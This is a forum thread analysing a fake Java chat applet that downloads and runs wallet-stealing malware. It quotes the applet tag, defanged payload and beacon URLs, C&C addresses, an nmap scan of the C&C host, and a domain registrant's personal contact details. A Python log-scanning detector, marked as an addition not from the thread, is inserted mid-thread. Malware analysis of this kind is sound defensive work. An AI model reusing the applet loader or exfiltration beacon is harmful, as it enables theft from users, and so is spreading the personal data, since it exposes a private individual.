Title: deleted
Post by: vipes2010 on April 19, 2013, 04:40:03 PM
deleted
Title: Re: Java Exploited Encrypted Wallet File
Post by: laanwj on April 19, 2013, 05:17:10 PM
There are multiple possibilities:

- Weak passphrase
- He still had an unencrypted copy of the wallet around on his system
- An unencrypted copy of the wallet was still somewhere in the unallocated/deleted part of the file system (if the exploit scans the raw disk)
- He did type the wallet passphrase (and it got keylogged) but forgot about it

I'm sure that all problems with unencrypted keys staying behind in the wallet.dat are solved in 0.8.0 (in 0.6.0 already). When you encrypt, or upgrade from an older insecure version (versions 0.4.0 and 0.5.0rc), the wallet is re-written without any unencrypted keys remaining behind in the slack space of the database. Also, all keys that were in the wallet before encryption are marked so they will not be used anymore.

If you're really paranoid about "unencrypted keys staying behind in unallocated space in the file system", an additional security mechanism is to send all your coins to a receiving address that is generated after the wallet is encrypted.

Title: Re: Java Exploited Encrypted Wallet File
Post by: Nicolai on April 19, 2013, 06:30:10 PM
The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html
Code:
<applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet>

The .jar contains:

The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (virustotal (https://www.virustotal.com/da/file/d274cc09f03047d03f228d4657e7ff7d7991daf835daa6eb015563c9dac33114/analysis/)) (I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better)

And a badly obfuscated "logger":
Quote
hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString
(could be some kind of pay-by-install?) paramString can be "Noa", "Noc", "Yes", "Nod"

(Also, "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing.)

EDIT1: The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91)
coinchat.freetzi.com = 69.162.82.249
fuskbugg.se = 88.80.2.12
galaxyjdb.com = 109.163.233.106

galaxyjdb.com is owned by:
Code:
Quick Ware
Alex B (sblfc1234@gmail.com)
+44.7543642587 Fax: +1.5555555555
8 does it matter road
Liverpool, merseyside l17 7ja
GB

EDIT2: The .jar exploit contains:
Code:
k{ol~puuly89: (Orpheu's skype = izroda6)Coded By Orpheu The Responsibility in the use of this is on the user not the coder

And the C&C server is most likely made using this tutorial: http://www.hackforums.net/showthread.php?tid=145184

Title: Re: Java Exploited Encrypted Wallet File
Post by: Mike Hearn on April 19, 2013, 06:35:55 PM
As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.
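A defender-side check for the "logger" beacon and the payload download Nicolai described in his post above, added here as an example and not code from the thread. It scans constructed proxy-log lines (format `timestamp src method url status`, an assumption) for the insert.php beacon shape with the four paramString states he listed, and for the smss2.exe download URL.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (not from the thread). The beacon URL follows the
# shape quoted in the post: insert.php?&o=<OS.name>&u=<id>&ip=<IP>&e=<paramString>
SAMPLE_LOG = """\
2013-04-19T18:02:11Z 10.0.0.12 GET http://galaxyjdb.com/insert.php?&o=Windows%207&u=thewinner1234&ip=10.0.0.12&e=Yes 200
2013-04-19T18:02:15Z 10.0.0.12 GET http://fuskbugg.se/dl/f1adsy/smss2.exe 200
2013-04-19T18:03:40Z 10.0.0.17 GET http://example.org/insert.php?o=1&u=2 200
2013-04-19T18:04:02Z 10.0.0.21 GET http://galaxyjdb.com/insert.php?&o=Windows%20XP&u=thewinner1234&ip=10.0.0.21&e=Nod 200
"""

# Indicators taken from the thread; the e= values are the four paramString states listed there.
BEACON_HOST = "galaxyjdb.com"
BEACON_PATH = "/insert.php"
BEACON_STATES = {"Noa", "Noc", "Yes", "Nod"}
PAYLOAD_HOST = "fuskbugg.se"
PAYLOAD_PATH = "/dl/f1adsy/smss2.exe"


def classify_url(url):
    """Return ('beacon', e-value), ('payload', '') or None for one request URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host == PAYLOAD_HOST and parts.path == PAYLOAD_PATH:
        return ("payload", "")
    if host == BEACON_HOST and parts.path == BEACON_PATH:
        # parse_qs silently drops the empty pair produced by the leading '?&'
        q = parse_qs(parts.query, keep_blank_values=True)
        if {"o", "u", "ip", "e"} <= set(q) and q["e"][0] in BEACON_STATES:
            return ("beacon", q["e"][0])
    return None


def find_hits(log_text):
    """Scan 'ts src method url status' lines; return (src, kind, detail) per match."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines rather than crash on them
        src, url = fields[1], fields[3]
        result = classify_url(url)
        if result:
            hits.append((src, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for src, kind, detail in find_hits(SAMPLE_LOG):
        print(f"{src}: {kind} {detail}".rstrip())
```

A source host that appears with both a payload download and a beacon, as 10.0.0.12 does in the sample, is the strongest signal; a beacon alone still warrants a look at that machine.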
Title: Re: Java Exploited Encrypted Wallet File
Post by: interfect on April 20, 2013, 12:58:42 AM
Holy Nmap Batman!

Code:
$ nmap 63.141.253.124

Starting Nmap 6.00 ( http://nmap.org ) at 2013-04-19 17:58 PDT
Nmap scan report for 63.141.253.124
Host is up (0.11s latency).
Not shown: 973 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
211/tcp   filtered 914c-g
445/tcp   filtered microsoft-ds
500/tcp   filtered isakmp
513/tcp   filtered login
666/tcp   filtered doom
1100/tcp  filtered mctp
1999/tcp  filtered tcp-id-port
2000/tcp  filtered cisco-sccp
2030/tcp  filtered device2
3006/tcp  filtered deslogind
3306/tcp  open     mysql
3814/tcp  filtered neto-dcs
5000/tcp  filtered upnp
6001/tcp  filtered X11:1
7938/tcp  filtered lgtomapper
8800/tcp  filtered sunwebadmin
8888/tcp  filtered sun-answerbook
9002/tcp  filtered dynamid
9290/tcp  filtered unknown
10215/tcp filtered unknown
40911/tcp filtered unknown
60020/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds

Title: Re: Java Exploited Encrypted Wallet File
Post by: Nicolai on April 20, 2013, 11:40:56 PM
Mike Hearn: You are right, it does not exploit any flaws in Java (it just asks for permission, then downloads and runs the malware).
Title: Re: Java Exploited Encrypted Wallet File
Post by: K1773R on April 21, 2013, 12:23:04 AM
Quote
As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.

If someone provides the AutoIt binary, I'll decompile it ;)

Title: Re: Java Exploited Encrypted Wallet File
Post by: K1773R on April 22, 2013, 11:35:58 AM
Unfortunately the code has been obfuscated, but you can still find out what it does; it just takes more time to understand it ;)

If someone is interested in it, send me a message and I'll send it to you (without the binary, of course!). I don't want to host this code since it's malware!